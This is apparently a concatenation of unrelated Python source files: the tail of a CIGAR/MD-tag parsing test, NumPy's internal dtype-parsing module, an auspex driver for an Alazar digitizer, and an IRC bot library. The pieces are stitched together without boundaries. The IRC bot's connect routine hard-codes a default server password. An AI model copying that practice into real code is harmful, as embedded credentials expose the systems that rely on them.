'GAGACGGGGTGACATCCGGCCTGCTCCTTCTCACAT')" parse_MDz_and_cigar('6M1I29M', 'MD:Z:0C1C0C1C0T0C27', 36, 'GAGACGGGGTGACATCCGGCCTGCTCCTTCTCACAT') print "parse_MDz_and_cigar('9M9D27M', 'MD:Z:2G0A5^ATGATGTCA27', 36, 'AGTGATGGGGGGGTTCCAGGTGGAGACGAGGACTCC')" parse_MDz_and_cigar('9M9D27M', 'MD:Z:2G0A5^ATGATGTCA27', 36, 'AGTGATGGGGGGGTTCCAGGTGGAGACGAGGACTCC') #test()
""" A place for code to be called from core C-code. Some things are more easily handled Python. """ from __future__ import division, absolute_import, print_function import re import sys from numpy.compat import basestring from .multiarray import dtype, array, ndarray import ctypes from .numerictypes import object_ if (sys.byteorder == 'little'): _nbo = b'<' else: _nbo = b'>' def _makenames_list(adict, align): allfields = [] fnames = list(adict.keys()) for fname in fnames: obj = adict[fname] n = len(obj) if not isinstance(obj, tuple) or n not in [2, 3]: raise ValueError("entry not a 2- or 3- tuple") if (n > 2) and (obj[2] == fname): continue num = int(obj[1]) if (num < 0): raise ValueError("invalid offset.") format = dtype(obj[0], align=align) if (n > 2): title = obj[2] else: title = None allfields.append((fname, format, num, title)) # sort by offsets allfields.sort(key=lambda x: x[2]) names = [x[0] for x in allfields] formats = [x[1] for x in allfields] offsets = [x[2] for x in allfields] titles = [x[3] for x in allfields] return names, formats, offsets, titles # Called in PyArray_DescrConverter function when # a dictionary without "names" and "formats" # fields is used as a data-type descriptor. def _usefields(adict, align): try: names = adict[-1] except KeyError: names = None if names is None: names, formats, offsets, titles = _makenames_list(adict, align) else: formats = [] offsets = [] titles = [] for name in names: res = adict[name] formats.append(res[0]) offsets.append(res[1]) if (len(res) > 2): titles.append(res[2]) else: titles.append(None) return dtype({"names": names, "formats": formats, "offsets": offsets, "titles": titles}, align) # construct an array_protocol descriptor list # from the fields attribute of a descriptor # This calls itself recursively but should eventually hit # a descriptor that has no fields and then return # a simple typestring def _array_descr(descriptor): fields = descriptor.fields if fields is None: subdtype = descriptor.subdtype if subdtype is None: if descriptor.metadata is None: return descriptor.str else: new = descriptor.metadata.copy() if new: return (descriptor.str, new) else: return descriptor.str else: return (_array_descr(subdtype[0]), subdtype[1]) names = descriptor.names ordered_fields = [fields[x] + (x,) for x in names] result = [] offset = 0 for field in ordered_fields: if field[1] > offset: num = field[1] - offset result.append(('', '|V%d' % num)) offset += num if len(field) > 3: name = (field[2], field[3]) else: name = field[2] if field[0].subdtype: tup = (name, _array_descr(field[0].subdtype[0]), field[0].subdtype[1]) else: tup = (name, _array_descr(field[0])) offset += field[0].itemsize result.append(tup) if descriptor.itemsize > offset: num = descriptor.itemsize - offset result.append(('', '|V%d' % num)) return result # Build a new array from the information in a pickle. # Note that the name numpy.core._internal._reconstruct is embedded in # pickles of ndarrays made with NumPy before release 1.0 # so don't remove the name here, or you'll # break backward compatibilty. def _reconstruct(subtype, shape, dtype): return ndarray.__new__(subtype, shape, dtype) # format_re was originally from numarray by J. Todd Miller format_re = re.compile(br'(?P<order1>[<>|=]?)' br'(?P<repeats> *[(]?[ ,0-9L]*[)]? *)' br'(?P<order2>[<>|=]?)' br'(?P<dtype>[A-Za-z0-9.?]*(?:\[[a-zA-Z0-9,.]+\])?)') sep_re = re.compile(br'\s*,\s*') space_re = re.compile(br'\s+$') # astr is a string (perhaps comma separated) _convorder = {b'=': _nbo} def _commastring(astr): startindex = 0 result = [] while startindex < len(astr): mo = format_re.match(astr, pos=startindex) try: (order1, repeats, order2, dtype) = mo.groups() except (TypeError, AttributeError): raise ValueError('format number %d of "%s" is not recognized' % (len(result)+1, astr)) startindex = mo.end() # Separator or ending padding if startindex < len(astr): if space_re.match(astr, pos=startindex): startindex = len(astr) else: mo = sep_re.match(astr, pos=startindex) if not mo: raise ValueError( 'format number %d of "%s" is not recognized' % (len(result)+1, astr)) startindex = mo.end() if order2 == b'': order = order1 elif order1 == b'': order = order2 else: order1 = _convorder.get(order1, order1) order2 = _convorder.get(order2, order2) if (order1 != order2): raise ValueError( 'inconsistent byte-order specification %s and %s' % (order1, order2)) order = order1 if order in [b'|', b'=', _nbo]: order = b'' dtype = order + dtype if (repeats == b''): newitem = dtype else: newitem = (dtype, eval(repeats)) result.append(newitem) return result def _getintp_ctype(): val = _getintp_ctype.cache if val is not None: return val char = dtype('p').char if (char == 'i'): val = ctypes.c_int elif char == 'l': val = ctypes.c_long elif char == 'q': val = ctypes.c_longlong else: val = ctypes.c_long _getintp_ctype.cache = val return val _getintp_ctype.cache = None # Used for .ctypes attribute of ndarray class _missing_ctypes(object): def cast(self, num, obj): return num def c_void_p(self, num): return num class _ctypes(object): def __init__(self, array, ptr=None): try: self._ctypes = ctypes except ImportError: self._ctypes = _missing_ctypes() self._arr = array self._data = ptr if self._arr.ndim == 0: self._zerod = True else: self._zerod = False def data_as(self, obj): return self._ctypes.cast(self._data, obj) def shape_as(self, obj): if self._zerod: return None return (obj*self._arr.ndim)(*self._arr.shape) def strides_as(self, obj): if self._zerod: return None return (obj*self._arr.ndim)(*self._arr.strides) def get_data(self): return self._data def get_shape(self): if self._zerod: return None return (_getintp_ctype()*self._arr.ndim)(*self._arr.shape) def get_strides(self): if self._zerod: return None return (_getintp_ctype()*self._arr.ndim)(*self._arr.strides) def get_as_parameter(self): return self._ctypes.c_void_p(self._data) data = property(get_data, None, doc="c-types data") shape = property(get_shape, None, doc="c-types shape") strides = property(get_strides, None, doc="c-types strides") _as_parameter_ = property(get_as_parameter, None, doc="_as parameter_") # Given a datatype and an order object # return a new names tuple # with the order indicated def _newnames(datatype, order): oldnames = datatype.names nameslist = list(oldnames) if isinstance(order, str): order = [order] if isinstance(order, (list, tuple)): for name in order: try: nameslist.remove(name) except ValueError: raise ValueError("unknown field name: %s" % (name,)) return tuple(list(order) + nameslist) raise ValueError("unsupported order value: %s" % (order,)) def _copy_fields(ary): """Return copy of structured array with padding between fields removed. Parameters ---------- ary : ndarray Structured array from which to remove padding bytes Returns ------- ary_copy : ndarray Copy of ary with padding bytes removed """ dt = ary.dtype copy_dtype = {'names': dt.names, 'formats': [dt.fields[name][0] for name in dt.names]} return array(ary, dtype=copy_dtype, copy=True) def _getfield_is_safe(oldtype, newtype, offset): """ Checks safety of getfield for object arrays. As in _view_is_safe, we need to check that memory containing objects is not reinterpreted as a non-object datatype and vice versa. Parameters ---------- oldtype : data-type Data type of the original ndarray. newtype : data-type Data type of the field being accessed by ndarray.getfield offset : int Offset of the field being accessed by ndarray.getfield Raises ------ TypeError If the field access is invalid """ if newtype.hasobject or oldtype.hasobject: if offset == 0 and newtype == oldtype: return if oldtype.names: for name in oldtype.names: if (oldtype.fields[name][1] == offset and oldtype.fields[name][0] == newtype): return raise TypeError("Cannot get/set field of an object array") return def _view_is_safe(oldtype, newtype): """ Checks safety of a view involving object arrays, for example when doing:: np.zeros(10, dtype=oldtype).view(newtype) Parameters ---------- oldtype : data-type Data type of original ndarray newtype : data-type Data type of the view Raises ------ TypeError If the new type is incompatible with the old type. """ # if the types are equivalent, there is no problem. # for example: dtype((np.record, 'i4,i4')) == dtype((np.void, 'i4,i4')) if oldtype == newtype: return if newtype.hasobject or oldtype.hasobject: raise TypeError("Cannot change data-type for object array.") return # Given a string containing a PEP 3118 format specifier, # construct a NumPy dtype _pep3118_native_map = { '?': '?', 'c': 'S1', 'b': 'b', 'B': 'B', 'h': 'h', 'H': 'H', 'i': 'i', 'I': 'I', 'l': 'l', 'L': 'L', 'q': 'q', 'Q': 'Q', 'e': 'e', 'f': 'f', 'd': 'd', 'g': 'g', 'Zf': 'F', 'Zd': 'D', 'Zg': 'G', 's': 'S', 'w': 'U', 'O': 'O', 'x': 'V', # padding } _pep3118_native_typechars = ''.join(_pep3118_native_map.keys()) _pep3118_standard_map = { '?': '?', 'c': 'S1', 'b': 'b', 'B': 'B', 'h': 'i2', 'H': 'u2', 'i': 'i4', 'I': 'u4', 'l': 'i4', 'L': 'u4', 'q': 'i8', 'Q': 'u8', 'e': 'f2', 'f': 'f', 'd': 'd', 'Zf': 'F', 'Zd': 'D', 's': 'S', 'w': 'U', 'O': 'O', 'x': 'V', # padding } _pep3118_standard_typechars = ''.join(_pep3118_standard_map.keys()) def _dtype_from_pep3118(spec, byteorder='@', is_subdtype=False): fields = {} offset = 0 explicit_name = False this_explicit_name = False common_alignment = 1 is_padding = False dummy_name_index = [0] def next_dummy_name(): dummy_name_index[0] += 1 def get_dummy_name(): while True: name = 'f%d' % dummy_name_index[0] if name not in fields: return name next_dummy_name() # Parse spec while spec: value = None # End of structure, bail out to upper level if spec[0] == '}': spec = spec[1:] break # Sub-arrays (1) shape = None if spec[0] == '(': j = spec.index(')') shape = tuple(map(int, spec[1:j].split(','))) spec = spec[j+1:] # Byte order if spec[0] in ('@', '=', '<', '>', '^', '!'): byteorder = spec[0] if byteorder == '!': byteorder = '>' spec = spec[1:] # Byte order characters also control native vs. standard type sizes if byteorder in ('@', '^'): type_map = _pep3118_native_map type_map_chars = _pep3118_native_typechars else: type_map = _pep3118_standard_map type_map_chars = _pep3118_standard_typechars # Item sizes itemsize = 1 if spec[0].isdigit(): j = 1 for j in range(1, len(spec)): if not spec[j].isdigit(): break itemsize = int(spec[:j]) spec = spec[j:] # Data types is_padding = False if spec[:2] == 'T{': value, spec, align, next_byteorder = _dtype_from_pep3118( spec[2:], byteorder=byteorder, is_subdtype=True) elif spec[0] in type_map_chars: next_byteorder = byteorder if spec[0] == 'Z': j = 2 else: j = 1 typechar = spec[:j] spec = spec[j:] is_padding = (typechar == 'x') dtypechar = type_map[typechar] if dtypechar in 'USV': dtypechar += '%d' % itemsize itemsize = 1 numpy_byteorder = {'@': '=', '^': '='}.get(byteorder, byteorder) value = dtype(numpy_byteorder + dtypechar) align = value.alignment else: raise ValueError("Unknown PEP 3118 data type specifier %r" % spec) # # Native alignment may require padding # # Here we assume that the presence of a '@' character implicitly implies # that the start of the array is *already* aligned. # extra_offset = 0 if byteorder == '@': start_padding = (-offset) % align intra_padding = (-value.itemsize) % align offset += start_padding if intra_padding != 0: if itemsize > 1 or (shape is not None and _prod(shape) > 1): # Inject internal padding to the end of the sub-item value = _add_trailing_padding(value, intra_padding) else: # We can postpone the injection of internal padding, # as the item appears at most once extra_offset += intra_padding # Update common alignment common_alignment = (align*common_alignment / _gcd(align, common_alignment)) # Convert itemsize to sub-array if itemsize != 1: value = dtype((value, (itemsize,))) # Sub-arrays (2) if shape is not None: value = dtype((value, shape)) # Field name this_explicit_name = False if spec and spec.startswith(':'): i = spec[1:].index(':') + 1 name = spec[1:i] spec = spec[i+1:] explicit_name = True this_explicit_name = True else: name = get_dummy_name() if not is_padding or this_explicit_name: if name in fields: raise RuntimeError("Duplicate field name '%s' in PEP3118 format" % name) fields[name] = (value, offset) if not this_explicit_name: next_dummy_name() byteorder = next_byteorder offset += value.itemsize offset += extra_offset # Check if this was a simple 1-item type if (len(fields) == 1 and not explicit_name and fields['f0'][1] == 0 and not is_subdtype): ret = fields['f0'][0] else: ret = dtype(fields) # Trailing padding must be explicitly added padding = offset - ret.itemsize if byteorder == '@': padding += (-offset) % common_alignment if is_padding and not this_explicit_name: ret = _add_trailing_padding(ret, padding) # Finished if is_subdtype: return ret, spec, common_alignment, byteorder else: return ret def _add_trailing_padding(value, padding): """Inject the specified number of padding bytes at the end of a dtype""" if value.fields is None: vfields = {'f0': (value, 0)} else: vfields = dict(value.fields) if (value.names and value.names[-1] == '' and value[''].char == 'V'): # A trailing padding field is already present vfields[''] = ('V%d' % (vfields[''][0].itemsize + padding), vfields[''][1]) value = dtype(vfields) else: # Get a free name for the padding field j = 0 while True: name = 'pad%d' % j if name not in vfields: vfields[name] = ('V%d' % padding, value.itemsize) break j += 1 value = dtype(vfields) if '' not in vfields: # Strip out the name of the padding field names = list(value.names) names[-1] = '' value.names = tuple(names) return value def _prod(a): p = 1 for x in a: p *= x return p def _gcd(a, b): """Calculate the greatest common divisor of a and b""" while b: a, b = b, a % b return a # Exception used in shares_memory() class TooHardError(RuntimeError): pass class AxisError(ValueError, IndexError): """ Axis supplied was invalid. """ def __init__(self, axis, ndim=None, msg_prefix=None): # single-argument form just delegates to base class if ndim is None and msg_prefix is None: msg = axis # do the string formatting here, to save work in the C code else: msg = ("axis {} is out of bounds for array of dimension {}" .format(axis, ndim)) if msg_prefix is not None: msg = "{}: {}".format(msg_prefix, msg) super(AxisError, self).__init__(msg)
# Copyright 2016 Raytheon BBN Technologies # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 __all__ = ['AlazarATS9870', 'AlazarChannel'] import re import socket import struct import datetime, time import sys import numpy as np from multiprocessing import Value from .instrument import Instrument, ReceiverChannel from auspex.log import logger import auspex.config as config from unittest.mock import MagicMock # win32 doesn't support MSG_WAITALL, so on windows we # need to do things a slower, less efficient way. # (we could optimize this, if performance becomes a problem) # # TODO: this code is repeated in the X6 driver. # if sys.platform == 'win32': def sock_recvall(s, data_len): buf = bytearray() while data_len > 0: new = s.recv(data_len) data_len -= len(new) buf.extend(new) return bytes(buf) else: def sock_recvall(s, data_len): return s.recv(data_len, socket.MSG_WAITALL) class AlazarChannel(ReceiverChannel): phys_channel = None def __init__(self, receiver_channel=None): if receiver_channel: self.set_by_receiver(receiver_channel) def set_all(self, settings_dict): for name, value in settings_dict.items(): if hasattr(self, name): setattr(self, name, value) def set_by_receiver(self, receiver): self.phys_channel = receiver.channel class AlazarATS9870(Instrument): """Alazar ATS9870 digitizer""" instrument_type = ("Digitizer") def __init__(self, resource_name=None, name="Unlabeled Alazar", gen_fake_data=False): self.name = name # A list of AlazarChannel objects self.channels = [] self.resource_name = resource_name # For lookup self._chan_to_buf = {} self._chan_to_rsocket = {} self._chan_to_wsocket = {} self.last_timestamp = Value('d', datetime.datetime.now().timestamp()) self.fetch_count = Value('d', 0) self.total_received = Value('d', 0) self.gen_fake_data = gen_fake_data self.increment_ideal_data = False self.ideal_counter = 0 self.ideal_data = None np.random.seed(12345) def connect(self, resource_name=None): if config.auspex_dummy_mode or self.gen_fake_data: self.fake_alazar = True self._lib = MagicMock() else: try: from libalazar import ATS9870 self._lib = ATS9870() self.fake_alazar = False except: raise Exception("Could not find libalazar. You can run in dummy mode by setting config.auspex_dummy_mode \ or setting the gen_fake_data property of this instrument.") if resource_name: self.resource_name = resource_name self._lib.connect("{}/{}".format(self.name, int(self.resource_name))) for channel in self.channels: self.get_socket(channel) def acquire(self): self.fetch_count.value = 0 self.total_received.value = 0 self._lib.acquire() def stop(self): self._lib.stop() def data_available(self): return self._lib.data_available() def done(self): received = self.total_received.value expected = self.number_segments * self.number_averages * self.record_length * len(self.channels) #logger.debug(f"Checking alazar doneness: {received} {expected}") return received >= expected def get_socket(self, channel): if channel in self._chan_to_rsocket: return self._chan_to_rsocket[channel] try: rsock, wsock = socket.socketpair() except: raise Exception("Could not create read/write socket pair") self._lib.register_socket(channel.phys_channel - 1, wsock) # logger.info(f"Passing socket {wsock} to libalazar driver") self._chan_to_rsocket[channel] = rsock self._chan_to_wsocket[channel] = wsock return rsock def add_channel(self, channel): if not isinstance(channel, AlazarChannel): raise TypeError("Alazar passed {} rather than an AlazarChannel object.".format(str(channel))) # We can have either 1 or 2, or both. if len(self.channels) < 2 and channel not in self.channels: self.channels.append(channel) self._chan_to_buf[channel] = channel.phys_channel def spew_fake_data(self, counter, ideal_data, random_mag=0.1, random_seed=12345): """ Generate fake data on the stream. For unittest usage. ideal_data: array or list giving means of the expected signal for each segment Returns the total number of fake data points, so that we can keep track of how many we expect to receive, when we're doing the test with fake data """ for chan, wsock in self._chan_to_wsocket.items(): length = int(self.record_length) buff = np.zeros((self.number_segments, length), dtype=np.float32) for i in range(self.number_segments): signal = np.sin(np.linspace(0,10.0*np.pi,int(length/2))) buff[i, int(length/4):int(length/4)+len(signal)] = signal * (1.0 if ideal_data[i] == 0 else ideal_data[i]) buff += random_mag*np.random.random((self.number_segments, length)) wsock.send(struct.pack('n', self.number_segments*length*np.float32().itemsize) + buff.flatten().tobytes()) counter[chan] += length*self.number_segments return length*self.number_segments*len(self._chan_to_wsocket) def receive_data(self, channel, oc, exit, ready, run): sock = self._chan_to_rsocket[channel] sock.settimeout(2) self.last_timestamp.value = datetime.datetime.now().timestamp() last_print = datetime.datetime.now().timestamp() ready.value += 1 while not exit.is_set(): # push data from a socket into an OutputConnector (oc) # wire format is just: [size, buffer...] # TODO receive 4 or 8 bytes depending on sizeof(size_t) if not run.is_set(): continue # Block until we are running again #logger.info(f'Run set when recv={self.total_received.value}, exp={self.number_segments*self.record_length*self.number_averages*len(self.channels)}') try: msg = sock.recv(8) self.last_timestamp.value = datetime.datetime.now().timestamp() except: logger.info("Didn't find any data on socket within 2 seconds (this is normal during experiment shutdown).") continue msg_size = struct.unpack('n', msg)[0] buf = sock_recvall(sock, msg_size) while len(buf) < msg_size: # time.sleep(0.01) buf2 = sock_recvall(sock, msg_size-len(buf)) buf = buf+buf2 data = np.frombuffer(buf, dtype=np.float32) self.total_received.value += len(data) if datetime.datetime.now().timestamp() - last_print > 0.25: last_print = datetime.datetime.now().timestamp() # logger.info(f"Alz: {self.total_received.value}") oc.push(data) self.fetch_count.value += 1 #logger.info(f'Exit set when recv={self.total_received.value}, exp={self.number_segments*self.record_length*self.number_averages*len(self.channels)}') def get_buffer_for_channel(self, channel): self.fetch_count.value += 1 return getattr(self._lib, 'ch{}Buffer'.format(self._chan_to_buf[channel])) def wait_for_acquisition(self, dig_run, timeout=5, ocs=None, progressbars=None): progress_updaters = {} if ocs and progressbars: for oc in ocs: if hasattr(progressbars[oc], 'goto'): progress_updaters[oc] = lambda x: progressbars[oc].goto(x) else: progress_updaters[oc] = lambda x: setattr(progressbars[oc], 'value', x) if self.gen_fake_data: total_spewed = 0 counter = {chan: 0 for chan in self._chan_to_wsocket.keys()} initial_points = {oc: oc.points_taken.value for oc in ocs} # print(self.number_averages, self.number_segments) for j in range(self.number_averages): # for i in range(self.number_segments): if self.ideal_data is not None: #add ideal data for testing if hasattr(self, 'exp_step') and self.increment_ideal_data: raise Exception("Cannot use both exp_step and increment_ideal_data") elif hasattr(self, 'exp_step'): total_spewed += self.spew_fake_data( counter, self.ideal_data[self.exp_step]) elif self.increment_ideal_data: total_spewed += self.spew_fake_data( counter, self.ideal_data[self.ideal_counter]) else: total_spewed += self.spew_fake_data( counter, self.ideal_data) else: total_spewed += self.spew_fake_data(counter, [0.0 for i in range(self.number_segments)]) time.sleep(0.0001) self.ideal_counter += 1 while not self.done(): if not dig_run.is_set(): self.last_timestamp.value = datetime.datetime.now().timestamp() if (datetime.datetime.now().timestamp() - self.last_timestamp.value) > timeout: logger.info(f"timeout when recv={self.total_received.value}, exp={self.number_segments*self.record_length*self.number_averages*len(self.channels)}") logger.error("Digitizer %s timed out. Timeout was %f, time was %f", self.name, timeout, (datetime.datetime.now().timestamp() - self.last_timestamp.value)) raise Exception("Alazar timed out.") if progressbars: for oc in ocs: progress_updaters[oc](oc.points_taken.value) #time.sleep(0.2) Does this need to be here at all? if progressbars: try: progressbars[oc].next() progressbars[oc].finish() except AttributeError: pass logger.info(f"Digitizer %s finished getting data when recv={self.total_received.value}, exp={self.number_segments*self.record_length*self.number_averages*len(self.channels)}.", self.name) def configure_with_dict(self, settings_dict): config_dict = { 'acquireMode': 'digitizer', 'bandwidth': "Full" , 'clockType': "ref", 'delay': 0.0, 'enabled': True, 'label': 'Alazar', 'recordLength': settings_dict['record_length'], 'nbrSegments': self.proxy_obj.number_segments, 'nbrWaveforms': self.proxy_obj.number_waveforms, 'nbrRoundRobins': self.proxy_obj.number_averages, 'samplingRate': self.proxy_obj.sampling_rate, 'triggerCoupling': "DC", 'triggerLevel': 100, 'triggerSlope': "rising", 'triggerSource': "Ext", 'verticalCoupling': "DC", 'verticalOffset': 0.0, 'verticalScale': self.proxy_obj.vertical_scale } self._lib.setAll(config_dict) self.record_length = settings_dict['record_length'] self.number_acquisitions = self._lib.numberAcquisitions self.samples_per_acquisition = self._lib.samplesPerAcquisition self.number_segments = self.proxy_obj.number_segments self.number_waveforms = self.proxy_obj.number_waveforms self.number_averages = self.proxy_obj.number_averages self.ch1_buffer = self._lib.ch1Buffer self.ch2_buffer = self._lib.ch2Buffer self.record_length = settings_dict['record_length'] self.number_segments = self.proxy_obj.number_segments self.number_waveforms = self.proxy_obj.number_waveforms self.number_averages = self.proxy_obj.number_averages def disconnect(self): self._lib.disconnect() for socket in self._chan_to_rsocket.values(): socket.close() for socket in self._chan_to_wsocket.values(): socket.close() self._chan_to_rsocket.clear() self._chan_to_wsocket.clear() self._lib.unregister_sockets() def __str__(self): return "<AlazarATS9870({}/{})>".format(self.name, self.resource_name)
# Copyright (C) 1999--2002 Joel Rosdahl # # This library is free software; you can redistribute it and/or # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. # # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA # # Joel Rosdahl <joel@rosdahl.net> # # $Id: ircbot.py,v 1.23 2008/09/11 07:38:30 keltus Exp $ """ircbot -- Simple IRC bot library. This module contains a single-server IRC bot class that can be used to write simpler bots. """ import sys from UserDict import UserDict from irclib import SimpleIRCClient from irclib import nm_to_n, irc_lower, all_events from irclib import parse_channel_modes, is_channel from irclib import ServerConnectionError class SingleServerIRCBot(SimpleIRCClient): """A single-server IRC bot class. The bot tries to reconnect if it is disconnected. The bot keeps track of the channels it has joined, the other clients that are present in the channels and which of those that have operator or voice modes. The "database" is kept in the self.channels attribute, which is an IRCDict of Channels. """ def __init__(self, server_list, nickname, realname, reconnection_interval=60): """Constructor for SingleServerIRCBot objects. Arguments: server_list -- A list of tuples (server, port) that defines which servers the bot should try to connect to. nickname -- The bot's nickname. realname -- The bot's realname. reconnection_interval -- How long the bot should wait before trying to reconnect. dcc_connections -- A list of initiated/accepted DCC connections. """ SimpleIRCClient.__init__(self) self.channels = IRCDict() self.server_list = server_list if not reconnection_interval or reconnection_interval < 0: reconnection_interval = 2**31 self.reconnection_interval = reconnection_interval self._nickname = nickname self._realname = realname for i in ["disconnect", "join", "kick", "mode", "namreply", "nick", "part", "quit"]: self.connection.add_global_handler(i, getattr(self, "_on_" + i), -10) def _connected_checker(self): """[Internal]""" if not self.connection.is_connected(): self.connection.execute_delayed(self.reconnection_interval, self._connected_checker) self.jump_server() def _connect(self): """[Internal]""" password = "muchmore512" if len(self.server_list[0]) > 2: password = self.server_list[0][2] try: self.connect(self.server_list[0][0], self.server_list[0][1], self._nickname, password, ircname=self._realname) except ServerConnectionError: pass def _on_disconnect(self, c, e): """[Internal]""" self.channels = IRCDict() self.connection.execute_delayed(self.reconnection_interval, self._connected_checker) def _on_join(self, c, e): """[Internal]""" ch = e.target() nick = nm_to_n(e.source()) if nick == c.get_nickname(): self.channels[ch] = Channel() self.channels[ch].add_user(nick) def _on_kick(self, c, e): """[Internal]""" nick = e.arguments()[0] channel = e.target() if nick == c.get_nickname(): del self.channels[channel] else: self.channels[channel].remove_user(nick) def _on_mode(self, c, e): """[Internal]""" modes = parse_channel_modes(" ".join(e.arguments())) t = e.target() if is_channel(t): ch = self.channels[t] for mode in modes: if mode[0] == "+": f = ch.set_mode else: f = ch.clear_mode f(mode[1], mode[2]) else: # Mode on self... XXX pass def _on_namreply(self, c, e): """[Internal]""" # e.arguments()[0] == "@" for secret channels, # "*" for private channels, # "=" for others (public channels) # e.arguments()[1] == channel # e.arguments()[2] == nick list ch = e.arguments()[1] for nick in e.arguments()[2].split(): if nick[0] == "@": nick = nick[1:] self.channels[ch].set_mode("o", nick) elif nick[0] == "%": nick = nick[1:] self.channels[ch].set_mode("h", nick) elif nick[0] == "+": nick = nick[1:] self.channels[ch].set_mode("v", nick) self.channels[ch].add_user(nick) def _on_nick(self, c, e): """[Internal]""" before = nm_to_n(e.source()) after = e.target() for ch in self.channels.values(): if ch.has_user(before): ch.change_nick(before, after) def _on_part(self, c, e): """[Internal]""" nick = nm_to_n(e.source()) channel = e.target() if nick == c.get_nickname(): del self.channels[channel] else: self.channels[channel].remove_user(nick) def _on_quit(self, c, e): """[Internal]""" nick = nm_to_n(e.source()) for ch in self.channels.values(): if ch.has_user(nick): ch.remove_user(nick) def die(self, msg="Bye, cruel world!"): """Let the bot die. Arguments: msg -- Quit message. """ self.connection.disconnect(msg) sys.exit(0) def disconnect(self, msg="I'll be back!"): """Disconnect the bot. The bot will try to reconnect after a while. Arguments: msg -- Quit message. """ self.connection.disconnect(msg) def get_version(self): """Returns the bot version. Used when answering a CTCP VERSION request. """ return "ircbot.py by Joel Rosdahl <joel@rosdahl.net>" def jump_server(self, msg="Changing servers"): """Connect to a new server, possibly disconnecting from the current. The bot will skip to next server in the server_list each time jump_server is called. """ if self.connection.is_connected(): self.connection.disconnect(msg) self.server_list.append(self.server_list.pop(0)) self._connect() def on_ctcp(self, c, e): """Default handler for ctcp events. Replies to VERSION and PING requests and relays DCC requests to the on_dccchat method. """ if e.arguments()[0] == "VERSION": c.ctcp_reply(nm_to_n(e.source()), "VERSION " + self.get_version()) elif e.arguments()[0] == "PING": if len(e.arguments()) > 1: c.ctcp_reply(nm_to_n(e.source()), "PING " + e.arguments()[1]) elif e.arguments()[0] == "DCC" and e.arguments()[1].split(" ", 1)[0] == "CHAT": self.on_dccchat(c, e) def on_dccchat(self, c, e): pass def start(self): """Start the bot.""" self._connect() SimpleIRCClient.start(self) class IRCDict: """A dictionary suitable for storing IRC-related things. Dictionary keys a and b are considered equal if and only if irc_lower(a) == irc_lower(b) Otherwise, it should behave exactly as a normal dictionary. """ def __init__(self, dict=None): self.data = {} self.canon_keys = {} # Canonical keys if dict is not None: self.update(dict) def __repr__(self): return repr(self.data) def __cmp__(self, dict): if isinstance(dict, IRCDict): return cmp(self.data, dict.data) else: return cmp(self.data, dict) def __len__(self): return len(self.data) def __getitem__(self, key): return self.data[self.canon_keys[irc_lower(key)]] def __setitem__(self, key, item): if key in self: del self[key] self.data[key] = item self.canon_keys[irc_lower(key)] = key def __delitem__(self, key): ck = irc_lower(key) del self.data[self.canon_keys[ck]] del self.canon_keys[ck] def __iter__(self): return iter(self.data) def __contains__(self, key): return self.has_key(key) def clear(self): self.data.clear() self.canon_keys.clear() def copy(self): if self.__class__ is UserDict: return UserDict(self.data) import copy return copy.copy(self) def keys(self): return self.data.keys() def items(self): return self.data.items() def values(self): return self.data.values() def has_key(self, key): return irc_lower(key) in self.canon_keys def update(self, dict): for k, v in dict.items(): self.data[k] = v def get(self, key, failobj=None): return self.data.get(key, failobj) class Channel: """A class for keeping information about an IRC channel. This class can be improved a lot. """ def __init__(self): self.userdict = IRCDict() self.operdict = IRCDict() self.halfoperdict = IRCDict() self.voiceddict = IRCDict() self.modes = {} def users(self): """Returns an unsorted list of the channel's users.""" return self.userdict.keys() def opers(self): """Returns an unsorted list of the channel's operators.""" return self.operdict.keys() def halfopers(self): """Returns an unsorted list of the channel's half operators. (added)""" return self.halfoperdict.keys() def voiced(self): """Returns an unsorted list of the persons that have voice mode set in the channel.""" return self.voiceddict.keys() def has_user(self, nick): """Check whether the channel has a user.""" return nick in self.userdict def is_oper(self, nick): """Check whether a user has operator status in the channel.""" return nick in self.operdict def is_halfoper(self, nick): """Check whether a user has operator status in the channel.""" return nick in self.halfoperdict def is_voiced(self, nick): """Check whether a user has voice mode set in the channel.""" return nick in self.voiceddict def add_user(self, nick): self.userdict[nick] = 1 def remove_user(self, nick): for d in self.userdict, self.operdict, self.halfoperdict, self.voiceddict: if nick in d: del d[nick] def change_nick(self, before, after): self.userdict[after] = 1 del self.userdict[before] if before in self.operdict: self.operdict[after] = 1 del self.operdict[before] if before in self.halfoperdict: self.halfoperdict[after] = 1 del self.halfoperdict[before] if before in self.voiceddict: self.voiceddict[after] = 1 del self.voiceddict[before] def set_mode(self, mode, value=None): """Set mode on the channel. Arguments: mode -- The mode (a single-character string). value -- Value """ if mode == "o": self.operdict[value] = 1 elif mode == "h": self.halfoperdict[value] = 1 elif mode == "v": self.voiceddict[value] = 1 else: self.modes[mode] = value def clear_mode(self, mode, value=None): """Clear mode on the channel. Arguments: mode -- The mode (a single-character string). value -- Value """ try: if mode == "o": del self.operdict[value] elif mode == "h": del self.halfoperdict[value] elif mode == "v": del self.voiceddict[value] else: del self.modes[mode] except KeyError: pass def has_mode(self, mode): return mode in self.modes def is_moderated(self): return self.has_mode("m") def is_secret(self): return self.has_mode("s") def is_protected(self): return self.has_mode("p") def has_topic_lock(self): return self.has_mode("t") def is_invite_only(self): return self.has_mode("i") def has_allow_external_messages(self): return self.has_mode("n") def has_limit(self): return self.has_mode("l") def limit(self): if self.has_limit(): return self.modes[l] else: return None def has_key(self): return self.has_mode("k") def key(self): if self.has_key(): return self.modes["k"] else: return None
